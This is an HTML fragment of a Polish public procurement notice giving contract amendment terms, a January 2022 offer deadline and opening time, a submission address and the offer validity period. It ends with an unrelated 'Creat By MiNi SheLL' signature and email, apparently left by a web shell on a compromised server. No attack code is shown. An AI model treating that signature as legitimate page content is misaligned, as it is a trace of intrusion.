<h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został wskazany w paragrafie 7<br/>Projektu (wzoru) do umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mcus.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com